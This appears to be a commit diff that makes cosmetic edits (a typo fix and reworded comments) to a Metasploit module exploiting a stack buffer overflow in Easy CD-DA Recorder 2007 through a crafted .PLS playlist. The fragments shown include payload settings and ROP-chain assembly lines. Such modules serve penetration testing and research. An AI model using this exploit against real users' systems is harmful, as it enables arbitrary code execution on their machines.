@@ -14,11 +14,11 @@ def initialize(info = {})
1414 super ( update_info ( info ,
1515 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow' ,
1616 'Description' => %q{
17- This module exploits a stack-based buffer overflow vulnerability in
17+ This module exploits a stack-based buffer overflow vulnerability in
1818 Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
1919 By persuading the victim to open a specially-crafted .PLS file, a
2020 remote attacker could execute arbitrary code on the system or cause
21- the application to crash. This modules has been tested successfully on
21+ the application to crash. This module has been tested successfully on
2222 Windows XP SP3 and Windows 7 SP1.
2323 } ,
2424 'License' => MSF_LICENSE ,
@@ -45,7 +45,7 @@ def initialize(info = {})
4545 'DisableNops' => true ,
4646 'BadChars' => "\x0a \x3d " ,
4747 'Space' => 2454 ,
48- 'PrependEncoder' => "\x81 \xc4 \x54 \xf2 \xff \xff " # Stack adjustment # add esp, -3500
48+ 'PrependEncoder' => "\x81 \xc4 \x54 \xf2 \xff \xff " # ADD ESP, -3500
4949 } ,
5050 'Targets' =>
5151 [
@@ -109,7 +109,7 @@ def exploit
109109 sploit << rop_nops ( 8 )
110110 sploit << rop_gadgets
111111 sploit << payload . encoded
112- sploit << rand_text_alpha_upper ( 10000 ) # make it crash
112+ sploit << rand_text_alpha_upper ( 10000 ) # Generate exception
113113
114114 # Create the file
115115 print_status ( "Creating '#{ datastore [ 'FILENAME' ] } ' file ..." )
0 commit comments